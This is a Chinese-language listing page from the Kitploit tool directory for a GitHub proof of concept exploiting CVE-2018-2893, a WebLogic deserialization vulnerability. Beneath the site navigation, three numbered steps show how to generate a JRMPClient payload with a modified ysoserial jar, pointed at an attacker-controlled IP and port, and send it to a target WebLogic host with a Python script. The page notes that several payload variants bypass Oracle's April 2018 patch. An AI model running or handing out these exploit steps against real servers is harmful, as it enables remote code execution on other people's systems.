Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-2893 — CVE-2018-2893-PoC | Kitploit
工具/GitHubGitHub/pyn3rd/cve-2018-2893
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHubpyn3rd/cve-2018-2893

CVE-2018-2893

CVE-2018-2893-PoC

查看仓库
105337年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2018-2893

步骤 1

java -jar ysoserial-cve-2018-2893.jar

root@kitploit:~
WHY SO SERIAL?
Usage: java -jar ysoserial-cve-2018-2893.jar [payload] '[command]'
Available payload types:
     Payload     Authors   Dependencies
     -------     -------   ------------
     JRMPClient  @mbechler
     JRMPClient2 @mbechler
     JRMPClient3 @mbechler
     JRMPClient4 @mbechler
     Jdk7u21     @frohoff

步骤 2

java -jar ysoserial-cve-2018-2893.jar JRMPClient4 "[IP]:[PORT]" > poc4.ser

步骤 3

python weblogic.py [HOST] [PORT] poc4.ser

注意:JRMPClient2、JRMPClient3、JRMPClient4 中的任意一个均可用于绕过 Critical Patch Update April 2018。

下载工具